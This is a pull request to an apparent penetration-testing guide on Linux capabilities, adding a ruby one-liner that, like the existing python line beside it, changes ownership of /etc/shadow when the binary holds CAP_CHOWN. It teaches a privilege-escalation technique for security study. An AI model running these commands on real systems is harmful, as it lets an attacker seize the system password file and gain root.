### PR TITLE
Add a ruby binary CAP_CHOWN example

### DIFF
--- a/linux-unix/privilege-escalation/linux-capabilities.md
+++ b/linux-unix/privilege-escalation/linux-capabilities.md
@@ -1123,6 +1123,11 @@ Lets suppose the **`python`** binary has this capability, you can **change** the
 python -c 'import os;os.chown("/etc/shadow",1000,1000)'
 ```
 
+Or with the **`ruby`** binary having this capability:
+```bash
+ruby -e 'require "fileutils"; FileUtils.chown(1000, 1000, "/etc/shadow")'
+```
+
 ### CAP\_FOWNER
 
 **This means that it's possible to change the permission of any file.**


### PR DESCRIPTION
Added an additional CAP_CHOWN example to demonstrate when the `ruby` binary has `cap_chown` capabilities.